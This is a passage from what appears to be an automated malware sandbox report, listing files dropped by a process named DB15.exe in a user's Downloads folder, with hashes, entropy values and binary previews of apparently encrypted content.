                                                                                                                                                                                                                                      Preview:QNCYC p.+...Q...!.V5..p3.+..u.B%O........*..pX-K:...QZ..&:....uQ`....".. .{........(..NK..i..<b.3.e...F..8mt-..Y.....(.F......}....!........:.:...m....2...<..H....]5oN..../.....}..,.o0....BFb.;....r.P.....G.....8...o.....4%...1Z.....-....:.....J3.....Tt..|e7J..u."..s..rjYE.,.&l ...sD..:......n..q..}...dU.1.......}....M....i:..Q-.U..(70......).. .c...^.L..+..".^-..[....6}]e:.y..).gAm.s..M(.5....+.c..Y.]....].{...S.PC.g..l..H.'.......p....+.'.bF.../O..2-.).....A.....F.S.......+L1...u.H..8,!Y}k.0.e...J.|.q%h-.....^......U.'..E.B...^>"...A$...$K.,... .!.........k.......>..f..rO.....9....eP.":"w....M...Cv...s....|p.G..../.....7.......&.......Et"..........0t.....y.8..(4.!.I:.W}.o'..xg.^k..qx.^..........=8..*e,.v.-....l......:RH....wt.j.;.;|.+r...K.-{.....~..1./....j...].?P.<R..*.Qr.Q....59t.!...._.z..../V+o..}.kkJU...Mj..~7{...A.s.....x....0H..D|....4N.).@.A.A....}oj..2}.[.:F..m.Jp...:MC..\......[@vT.F<...>..3......C.:a.@L2.pvH.6(....

                                                                                                                                                                                                                                      C:\Users\user\Downloads\QNCYCDFIJJ.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.852157928307316
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:x3pFP7T3MX5iV+Q2wjVtUO8k4BPmRit9zXKflK6E8OR/08s/iTkbD:x37TTs5iV+XnmRiKYvr/BXiD
                                                                                                                                                                                                                                      MD5:FAE676442245139F60FEE8C663B1B1EB
                                                                                                                                                                                                                                      SHA1:56F79592EF689D529AE6D4AD6BCF23A22755751A
                                                                                                                                                                                                                                      SHA-256:D453B4A2C8347202B2B4C6444E05F0CD1BEF74CA7C69B7B951C1A8139CDB4A4B
                                                                                                                                                                                                                                      SHA-512:B22CFC5E76F68A4B6F45AC00743BEBADC87465F6AC4F347F039C3F7B61AFF6DD33D43DBE956E4F4432DD924FBEBABDB6DFE4DCD64447DAF6C24B4EB9D4DC2A11
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:QNCYC p.+...Q...!.V5..p3.+..u.B%O........*..pX-K:...QZ..&:....uQ`....".. .{........(..NK..i..<b.3.e...F..8mt-..Y.....(.F......}....!........:.:...m....2...<..H....]5oN..../.....}..,.o0....BFb.;....r.P.....G.....8...o.....4%...1Z.....-....:.....J3.....Tt..|e7J..u."..s..rjYE.,.&l ...sD..:......n..q..}...dU.1.......}....M....i:..Q-.U..(70......).. .c...^.L..+..".^-..[....6}]e:.y..).gAm.s..M(.5....+.c..Y.]....].{...S.PC.g..l..H.'.......p....+.'.bF.../O..2-.).....A.....F.S.......+L1...u.H..8,!Y}k.0.e...J.|.q%h-.....^......U.'..E.B...^>"...A$...$K.,... .!.........k.......>..f..rO.....9....eP.":"w....M...Cv...s....|p.G..../.....7.......&.......Et"..........0t.....y.8..(4.!.I:.W}.o'..xg.^k..qx.^..........=8..*e,.v.-....l......:RH....wt.j.;.;|.+r...K.-{.....~..1./....j...].?P.<R..*.Qr.Q....59t.!...._.z..../V+o..}.kkJU...Mj..~7{...A.s.....x....0H..D|....4N.).@.A.A....}oj..2}.[.:F..m.Jp...:MC..\......[@vT.F<...>..3......C.:a.@L2.pvH.6(....

                                                                                                                                                                                                                                      C:\Users\user\Downloads\SFPUSAFIOL.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8464861944072295
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:P+6sGGm2j3IZqgImsdqPzQn6JwY9rLeZNKGofS2HHxhybVBZTHSTLWLiTkbD:VsGGm2b+q7mUqPcn6JwHZNWH+bVrWiD
                                                                                                                                                                                                                                      MD5:86F646994485ABFA10FA145BE8C424DD
                                                                                                                                                                                                                                      SHA1:2A777C9CE6FA70171DCF9761E855C75ED1C10799
                                                                                                                                                                                                                                      SHA-256:2DD0E2D58A84EFC2F8319C489110BD858DF9A094FE33BC3D49D15D52F9D7F8C5
                                                                                                                                                                                                                                      SHA-512:5C1D9E1C62C82F586FDD8A693C56E14C2D6F6163F9403A6204005657F74E99350A398BE7F9220AA14896CC559017FDFAD83207245F1DBD1CCF2DBE7C9E7F48F6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS.8..t7.V..td.."k.If.J..Y^.a.*..B.O.D.....G..!.n....>.z..x.r..@..Z?....u ...P._e...P=........Sk.R..7..<..].h.P......+E[...df......B.o+Rb....5.?../"-.....ag....1:........|G."Y/Z..?6.w.Q.K .ij..^IS,~....8A...G.r.I..m.4......-..N....6..sV..+5.... ...@../B....kC......fx.\YW...>8e....R......lG....G..!.fu7`R .WQ.bY...KfO...`.\..mQ.P..E.CJb~..v.'.P.=oA.Do.-......QC.X.?..v3.9.'k...9+zU...d....R..G...SP..a3.e...H..J.ch.0f3G..Q[..|8@........Hek.E....S......;.k[..,.J....e.._$......D..f...W9..`nm.&i..7}....y..^.tv..7J.;ld.Y.%*-:..~.. ...w..".0Qu..l...@$...'4d....yK..j..b....i...a].}.R>Y..|.lT..Wf..(SX.6..l..b{G..]'.3..P8Q......,.+.~.....h...c.....z..S.-.......O.n...i.2.D.....6.W....."...g..t.g..T...k.E_.}*.A.."........eT.,;....p2...+.&..'.-..Q.n.J7..c..6..Vp.....R..?9.A......}..-..-.7.+..q./...o.l.:fQ.R@...B&.$<.%N....P.j./..9M.._.l.#.f.9..].8.0.(..{n.H...H..B.k.7.)j..2).Ks.x.?r.{.;..vX=...F*..c..r....G..K[..b8..j,4f.1@...u.fj...[....o..7..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\SFPUSAFIOL.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8464861944072295
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:P+6sGGm2j3IZqgImsdqPzQn6JwY9rLeZNKGofS2HHxhybVBZTHSTLWLiTkbD:VsGGm2b+q7mUqPcn6JwHZNWH+bVrWiD
                                                                                                                                                                                                                                      MD5:86F646994485ABFA10FA145BE8C424DD
                                                                                                                                                                                                                                      SHA1:2A777C9CE6FA70171DCF9761E855C75ED1C10799
                                                                                                                                                                                                                                      SHA-256:2DD0E2D58A84EFC2F8319C489110BD858DF9A094FE33BC3D49D15D52F9D7F8C5
                                                                                                                                                                                                                                      SHA-512:5C1D9E1C62C82F586FDD8A693C56E14C2D6F6163F9403A6204005657F74E99350A398BE7F9220AA14896CC559017FDFAD83207245F1DBD1CCF2DBE7C9E7F48F6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS.8..t7.V..td.."k.If.J..Y^.a.*..B.O.D.....G..!.n....>.z..x.r..@..Z?....u ...P._e...P=........Sk.R..7..<..].h.P......+E[...df......B.o+Rb....5.?../"-.....ag....1:........|G."Y/Z..?6.w.Q.K .ij..^IS,~....8A...G.r.I..m.4......-..N....6..sV..+5.... ...@../B....kC......fx.\YW...>8e....R......lG....G..!.fu7`R .WQ.bY...KfO...`.\..mQ.P..E.CJb~..v.'.P.=oA.Do.-......QC.X.?..v3.9.'k...9+zU...d....R..G...SP..a3.e...H..J.ch.0f3G..Q[..|8@........Hek.E....S......;.k[..,.J....e.._$......D..f...W9..`nm.&i..7}....y..^.tv..7J.;ld.Y.%*-:..~.. ...w..".0Qu..l...@$...'4d....yK..j..b....i...a].}.R>Y..|.lT..Wf..(SX.6..l..b{G..]'.3..P8Q......,.+.~.....h...c.....z..S.-.......O.n...i.2.D.....6.W....."...g..t.g..T...k.E_.}*.A.."........eT.,;....p2...+.&..'.-..Q.n.J7..c..6..Vp.....R..?9.A......}..-..-.7.+..q./...o.l.:fQ.R@...B&.$<.%N....P.j./..9M.._.l.#.f.9..].8.0.(..{n.H...H..B.k.7.)j..2).Ks.x.?r.{.;..vX=...F*..c..r....G..K[..b8..j,4f.1@...u.fj...[....o..7..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\SFPUSAFIOL.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.825282047160918
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:WDZ0XYKo782LOt9O/NTX4rtevE0Ki6ZnsnommTSn0fNm3Ze2H45uSriTkbD:WDZ4IqtmZIrgWtyI20VKe2Y6iD
                                                                                                                                                                                                                                      MD5:0930C61DF106C23460E1B467EC92D0CD
                                                                                                                                                                                                                                      SHA1:1F2BC6150DFF27ED2BFFEB7F80D09436EE06534F
                                                                                                                                                                                                                                      SHA-256:84F28B3EFB2965EC99FA207376D9A9FAF7E65DAAD10E5B81A64538CCAFC1804E
                                                                                                                                                                                                                                      SHA-512:86AFBB4260469B29DEC1BFD10D3951473840E77308BCCEC2C766D47920FDAF4DC0FB3A9BAFA53E75E66DB1907AC04FF5039921CE1967A3212DA83F0486F0D228
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS..B\..l..z.O+.....z$..xj.C.x.pYz.`..Rnr.B.+...x./.. ..wH....N...t"]&....A..!*.N&'v.vP./....D...;..F..g...A"zaq...+.B]LG..]\...:)l.......D...".....u4.N0F#..Z.......F...X/kx.%.3..(....Y{....S..Q..R.p..T.$..|..+j..=`.OD.N..|....OhV.......N.&.rM..f...|.....s.....h.j...#....Q0...k,w.@KK^...6.......O....=...{.2.......}1..n..{.N.E.k...[.._.`..c....Y.~@^.*.J.T)..(.._.F...}..^.0f...D.-...z ..._.b.S...;.jJ..BS..P3K.!......wAp.J...........}.2..=....>E.PW }zZ.....Q..l.....Q...Xt^C.C.j$.....K`......dM%Z.BMR[..i...o..4I(.|!a^Z........H;f(...X...H.ud.....Wq9....?...h..,.......Av........N-..<.T.....i...O..k.#...B..83..7h.;..a.z2......I}.2).H.....+..3.W.TYG....p..SXV.|B0?.K"T.P46..U..d.Q...x..=..#>_.G...f.:.|mu.z.R7{AH..i..H..i.=S....,2..)....0^..s..,.....1..@A..C...s..f..I!S....H..O.iU...t.....F......\..[........).t..._....=.De....c.=..:....-..9j.F..n[...-e`.y7..|...F..t2.:s}........!Yv...>.".6...p`.....[uy..U;Q2.../7.G}._.........K>...Y..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\SFPUSAFIOL.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.825282047160918
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:WDZ0XYKo782LOt9O/NTX4rtevE0Ki6ZnsnommTSn0fNm3Ze2H45uSriTkbD:WDZ4IqtmZIrgWtyI20VKe2Y6iD
                                                                                                                                                                                                                                      MD5:0930C61DF106C23460E1B467EC92D0CD
                                                                                                                                                                                                                                      SHA1:1F2BC6150DFF27ED2BFFEB7F80D09436EE06534F
                                                                                                                                                                                                                                      SHA-256:84F28B3EFB2965EC99FA207376D9A9FAF7E65DAAD10E5B81A64538CCAFC1804E
                                                                                                                                                                                                                                      SHA-512:86AFBB4260469B29DEC1BFD10D3951473840E77308BCCEC2C766D47920FDAF4DC0FB3A9BAFA53E75E66DB1907AC04FF5039921CE1967A3212DA83F0486F0D228
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS..B\..l..z.O+.....z$..xj.C.x.pYz.`..Rnr.B.+...x./.. ..wH....N...t"]&....A..!*.N&'v.vP./....D...;..F..g...A"zaq...+.B]LG..]\...:)l.......D...".....u4.N0F#..Z.......F...X/kx.%.3..(....Y{....S..Q..R.p..T.$..|..+j..=`.OD.N..|....OhV.......N.&.rM..f...|.....s.....h.j...#....Q0...k,w.@KK^...6.......O....=...{.2.......}1..n..{.N.E.k...[.._.`..c....Y.~@^.*.J.T)..(.._.F...}..^.0f...D.-...z ..._.b.S...;.jJ..BS..P3K.!......wAp.J...........}.2..=....>E.PW }zZ.....Q..l.....Q...Xt^C.C.j$.....K`......dM%Z.BMR[..i...o..4I(.|!a^Z........H;f(...X...H.ud.....Wq9....?...h..,.......Av........N-..<.T.....i...O..k.#...B..83..7h.;..a.z2......I}.2).H.....+..3.W.TYG....p..SXV.|B0?.K"T.P46..U..d.Q...x..=..#>_.G...f.:.|mu.z.R7{AH..i..H..i.=S....,2..)....0^..s..,.....1..@A..C...s..f..I!S....H..O.iU...t.....F......\..[........).t..._....=.De....c.=..:....-..9j.F..n[...-e`.y7..|...F..t2.:s}........!Yv...>.".6...p`.....[uy..U;Q2.../7.G}._.........K>...Y..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\SFPUSAFIOL.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.849588226234741
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:gwxf5vS6zE6hkiRkxVTS6TZbZMadUbmPttzkxq4YlkwCIk/iTkbD:g6foaLbRkxVTSc9vdU43kk4Ye0iD
                                                                                                                                                                                                                                      MD5:E76311499A969B8C3BEBF5C1E6917A04
                                                                                                                                                                                                                                      SHA1:7E3919989A822D2AE3F9EF2B974F6BBB4A260A94
                                                                                                                                                                                                                                      SHA-256:8C9AD26DE16E88681738DD5756BF49C6F5AC196E50AC4BF35E06A98C0B156E02
                                                                                                                                                                                                                                      SHA-512:BE088A22B89E667440F746B11FF02D3F95E3C5C18AE6A30ABED0F355CF7075D63FCCB289E8364AAF6E78A31CCEA56D0D5ADEEE2F864349B6F924391C4D4F8DFA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUSCO...K(...}h6.."...3YO......^...|AlB.p.a.E(1.ZK3u.R..#Y.P.l<...9....5..-.Q......VL..M..."....[..h.D..*>.R.D;. >i+D...k....}.....+...XH..H.x)..D..x+;..[P}.o.L2.t..n{.;d3ZYc./.....A2...{I.H@D...g.]C..:.....j%yRYH.X..^..U......R}.....(.M..f}%.X..:.V..Nyq...'....Yj{......S.+.|..:.n.S.^.q.i..Yw-...Z."..N...P.3.^4'.@[....3..+...}....ARZ....j..n..{X..a=.;...l....5sk/.@X?..../e.. .E..FLP.G...LO....'43.P............0.A{% ...4../..\s.e..r...U...gB.%."o.....v.c(..v.......jt.e...'.`+...$..c..+.......xe..\.]?..*.H.'..e.Z.b.N;U..?s.,....w..0..G....L.m..\(.R.....Y.......1.....$.9H<...+..l...Y....1Z....J..I#.8......jp....P1.V0j..P.....I..A.'...9.71(.|./.........5...3.j..l....E5.....t..s.....%8.....QD....d.z].S.?......t....-...m..A....~B&d$M:O".';...!b.......! .....T;a..7..NdBZx.{|....&...p.\.{.5.._....J5...8....A.SrQgq.M.....c.......,..F...J....."T.hu`.N......w?<...E.....s....d..K.H;.s..0Z..`....a.3;[..6......i...%..'*.7.J..<.vOI...#.!X.......

                                                                                                                                                                                                                                      C:\Users\user\Downloads\SFPUSAFIOL.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.849588226234741
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:gwxf5vS6zE6hkiRkxVTS6TZbZMadUbmPttzkxq4YlkwCIk/iTkbD:g6foaLbRkxVTSc9vdU43kk4Ye0iD
                                                                                                                                                                                                                                      MD5:E76311499A969B8C3BEBF5C1E6917A04
                                                                                                                                                                                                                                      SHA1:7E3919989A822D2AE3F9EF2B974F6BBB4A260A94
                                                                                                                                                                                                                                      SHA-256:8C9AD26DE16E88681738DD5756BF49C6F5AC196E50AC4BF35E06A98C0B156E02
                                                                                                                                                                                                                                      SHA-512:BE088A22B89E667440F746B11FF02D3F95E3C5C18AE6A30ABED0F355CF7075D63FCCB289E8364AAF6E78A31CCEA56D0D5ADEEE2F864349B6F924391C4D4F8DFA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUSCO...K(...}h6.."...3YO......^...|AlB.p.a.E(1.ZK3u.R..#Y.P.l<...9....5..-.Q......VL..M..."....[..h.D..*>.R.D;. >i+D...k....}.....+...XH..H.x)..D..x+;..[P}.o.L2.t..n{.;d3ZYc./.....A2...{I.H@D...g.]C..:.....j%yRYH.X..^..U......R}.....(.M..f}%.X..:.V..Nyq...'....Yj{......S.+.|..:.n.S.^.q.i..Yw-...Z."..N...P.3.^4'.@[....3..+...}....ARZ....j..n..{X..a=.;...l....5sk/.@X?..../e.. .E..FLP.G...LO....'43.P............0.A{% ...4../..\s.e..r...U...gB.%."o.....v.c(..v.......jt.e...'.`+...$..c..+.......xe..\.]?..*.H.'..e.Z.b.N;U..?s.,....w..0..G....L.m..\(.R.....Y.......1.....$.9H<...+..l...Y....1Z....J..I#.8......jp....P1.V0j..P.....I..A.'...9.71(.|./.........5...3.j..l....E5.....t..s.....%8.....QD....d.z].S.?......t....-...m..A....~B&d$M:O".';...!b.......! .....T;a..7..NdBZx.{|....&...p.\.{.5.._....J5...8....A.SrQgq.M.....c.......,..F...J....."T.hu`.N......w?<...E.....s....d..K.H;.s..0Z..`....a.3;[..6......i...%..'*.7.J..<.vOI...#.!X.......

                                                                                                                                                                                                                                      C:\Users\user\Downloads\SQRKHNBNYN.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.841332477506986
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:mj8cv2HOUoZg/Vj+H+Qs9lf+WNZL6UkVxwGIgOLEty15qkwY5KiTkbD:mj8cv2HTHdHpr1NYx5IJnz7iD
                                                                                                                                                                                                                                      MD5:961F0E9007893684240F7A8231BA1814
                                                                                                                                                                                                                                      SHA1:948A692957EC133F4A17D76FA2E5CF279978439F
                                                                                                                                                                                                                                      SHA-256:D619A22C50A9F81509667FA6A663448A9385E60AB7CA3E1B7824F509DF7BF550
                                                                                                                                                                                                                                      SHA-512:0CE4B8526ABC10DC7DCD0B99821C968E22CCBBCAD1A3EBC13A1162B9BF66F7301A1D65070D78AE7426BA405C22641305622630FA5DDC8B9B9116A04D2E2F2D66
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQRKH./A9H'.j.2j..qWj.R.....<J.O.!.XOO?.....e.4..+....G[......}.z....E...PCsM9...9/.y...........VT..8#S+..O.....-v..,.'.Wp..k{........T...S.b*..{R...Q_1.....Wk.;nB...8......1.S.!..[..}.....O,v.+.Pp.y*M......N/..c.}......N.../.....Z$...z....K.b.LOn........tp..Tb....EP.:g.c.LME1`..;......(.)3..-...U...L6?.....o. .O.JJ.......<.....s..'Q.}...g.I..o.L.).W.qd..z=.W,.7....j..k.K3y.Y?dd..j}..2.o.. ..xT.3..*...T............2E...GK)gC.x.....I.jl6!.e...n.....f..^\.}....i.',...?.fW9.M+..;...o.R:.C.n..J.........j.a...&%_.'...p....OV...y..aV.iQ."..j.4...H.a.....(.A...."G.T.4.EW$....j..X... {......u..:D.j.\...R.V.. ....].,............R......R.......Fj.ng.,...Y....|.u.S..x....y.I......s....m...P.HE.J..I)..$.f}[..lJz.(;....S.g{..s[....(I.Q^...9..4......]...B!.+?.yyx....i5.*I.)}.v......rIN.ao.......?d...rk...._.V.B.....~qg.a...G\..o.8w@).a......z.I.*.....=..2/a...Hy.E...P..a...l..=..l.?......9w....i!...*.+.AW.W..A...A.....|"..*.?.H....q..Q

                                                                                                                                                                                                                                      C:\Users\user\Downloads\SQRKHNBNYN.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.841332477506986
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:mj8cv2HOUoZg/Vj+H+Qs9lf+WNZL6UkVxwGIgOLEty15qkwY5KiTkbD:mj8cv2HTHdHpr1NYx5IJnz7iD
                                                                                                                                                                                                                                      MD5:961F0E9007893684240F7A8231BA1814
                                                                                                                                                                                                                                      SHA1:948A692957EC133F4A17D76FA2E5CF279978439F
                                                                                                                                                                                                                                      SHA-256:D619A22C50A9F81509667FA6A663448A9385E60AB7CA3E1B7824F509DF7BF550
                                                                                                                                                                                                                                      SHA-512:0CE4B8526ABC10DC7DCD0B99821C968E22CCBBCAD1A3EBC13A1162B9BF66F7301A1D65070D78AE7426BA405C22641305622630FA5DDC8B9B9116A04D2E2F2D66
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQRKH./A9H'.j.2j..qWj.R.....<J.O.!.XOO?.....e.4..+....G[......}.z....E...PCsM9...9/.y...........VT..8#S+..O.....-v..,.'.Wp..k{........T...S.b*..{R...Q_1.....Wk.;nB...8......1.S.!..[..}.....O,v.+.Pp.y*M......N/..c.}......N.../.....Z$...z....K.b.LOn........tp..Tb....EP.:g.c.LME1`..;......(.)3..-...U...L6?.....o. .O.JJ.......<.....s..'Q.}...g.I..o.L.).W.qd..z=.W,.7....j..k.K3y.Y?dd..j}..2.o.. ..xT.3..*...T............2E...GK)gC.x.....I.jl6!.e...n.....f..^\.}....i.',...?.fW9.M+..;...o.R:.C.n..J.........j.a...&%_.'...p....OV...y..aV.iQ."..j.4...H.a.....(.A...."G.T.4.EW$....j..X... {......u..:D.j.\...R.V.. ....].,............R......R.......Fj.ng.,...Y....|.u.S..x....y.I......s....m...P.HE.J..I)..$.f}[..lJz.(;....S.g{..s[....(I.Q^...9..4......]...B!.+?.yyx....i5.*I.)}.v......rIN.ao.......?d...rk...._.V.B.....~qg.a...G\..o.8w@).a......z.I.*.....=..2/a...Hy.E...P..a...l..=..l.?......9w....i!...*.+.AW.W..A...A.....|"..*.?.H....q..Q

                                                                                                                                                                                                                                      C:\Users\user\Downloads\SQSJKEBWDT.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.846309825185332
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:UPD+MagMxHpCzKoBDNbqaXk24p7u30T8XrC3uL3va2EDWfWI2JGxjoiTkbD:UPSbpxHoeuXXapiEB3uL3va2EmWI2Stq
                                                                                                                                                                                                                                      MD5:C457C9F5E812558A7B1BD505DEAECEB0
                                                                                                                                                                                                                                      SHA1:96607B2B58230CCE8A05274B48942F6709419E4E
                                                                                                                                                                                                                                      SHA-256:DE05718A4A5170A40E764EDFE908278FE60C8D3FE486877D06C3C4E1902EA23D
                                                                                                                                                                                                                                      SHA-512:BD3172AEED97466FD12B224FDBC58788732A3CB2EE1584B855B230B4829D5EFBAB6B8F43DDE254DABA82BBE73F099956BFA81814B04F82C721D29728DE167A0C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQSJK@..c.u....1...?1.7....J.....C.P...S.u..@p.....H....E.@..O.~rX6..2q.3.?L..<..`._.|. .X)7.'>Z..Y.-.....;..@.#.Q..}.....y7].Z..AL...X.{"..x..~"0...:..W.6...........zz.(!...F.../.....(..x#....Hf|".@....7M...{.._.).@..p.H.q..........$..@.X...wnrc........nP.aQ..V.|."..a.?~......._b..i.....!.@.a....D.pg.......w&#...=.2...suk6....Kz.YI..I6.k....6.e....\..s"R.T.V@.,....j.}.p.Y<X.?......#.z...._....v....C^.l.?.6...7.....}....C.....9..hZ..%6X.....R.Q.y.?5..;.Wr.'m.&...T#D9J{.......f.u.k....6...8e.Y.....$..y ..6....lE,.K3.UGu.Y.wM.tr..."..w.....]{....E..m.6G+.~:.\b=&..*..R.M...<.....>..|N..2.18B.hv.b.u.-@."....A.k'.>.'!.J....2)R./...6r......T_./.I`8dk....l......I.V.<.."P...#(6.H._ .Q.h..p<.7$`a|.?C.|n.j../..K..mO..., .y........DkL....%...N.8..j.8h~..dQJ>)Z..,.*..7?@...)a.~......I...Q4G..FSyd..g..L.z..}.8...ssX^.....$.RhC.....d.Ns.....(;%....i..}....M........S{.t.Gv..-:...a.).Z.(...4.^...."K7.=..^0*.;...`D...Q..).e..>6..Y..D..u#...o. ...j....4R.*

                                                                                                                                                                                                                                      C:\Users\user\Downloads\SQSJKEBWDT.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.846309825185332
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:UPD+MagMxHpCzKoBDNbqaXk24p7u30T8XrC3uL3va2EDWfWI2JGxjoiTkbD:UPSbpxHoeuXXapiEB3uL3va2EmWI2Stq
                                                                                                                                                                                                                                      MD5:C457C9F5E812558A7B1BD505DEAECEB0
                                                                                                                                                                                                                                      SHA1:96607B2B58230CCE8A05274B48942F6709419E4E
                                                                                                                                                                                                                                      SHA-256:DE05718A4A5170A40E764EDFE908278FE60C8D3FE486877D06C3C4E1902EA23D
                                                                                                                                                                                                                                      SHA-512:BD3172AEED97466FD12B224FDBC58788732A3CB2EE1584B855B230B4829D5EFBAB6B8F43DDE254DABA82BBE73F099956BFA81814B04F82C721D29728DE167A0C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQSJK@..c.u....1...?1.7....J.....C.P...S.u..@p.....H....E.@..O.~rX6..2q.3.?L..<..`._.|. .X)7.'>Z..Y.-.....;..@.#.Q..}.....y7].Z..AL...X.{"..x..~"0...:..W.6...........zz.(!...F.../.....(..x#....Hf|".@....7M...{.._.).@..p.H.q..........$..@.X...wnrc........nP.aQ..V.|."..a.?~......._b..i.....!.@.a....D.pg.......w&#...=.2...suk6....Kz.YI..I6.k....6.e....\..s"R.T.V@.,....j.}.p.Y<X.?......#.z...._....v....C^.l.?.6...7.....}....C.....9..hZ..%6X.....R.Q.y.?5..;.Wr.'m.&...T#D9J{.......f.u.k....6...8e.Y.....$..y ..6....lE,.K3.UGu.Y.wM.tr..."..w.....]{....E..m.6G+.~:.\b=&..*..R.M...<.....>..|N..2.18B.hv.b.u.-@."....A.k'.>.'!.J....2)R./...6r......T_./.I`8dk....l......I.V.<.."P...#(6.H._ .Q.h..p<.7$`a|.?C.|n.j../..K..mO..., .y........DkL....%...N.8..j.8h~..dQJ>)Z..,.*..7?@...)a.~......I...Q4G..FSyd..g..L.z..}.8...ssX^.....$.RhC.....d.Ns.....(;%....i..}....M........S{.t.Gv..-:...a.).Z.(...4.^...."K7.=..^0*.;...`D...Q..).e..>6..Y..D..u#...o. ...j....4R.*

                                                                                                                                                                                                                                      C:\Users\user\Downloads\UOOJJOZIRH.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
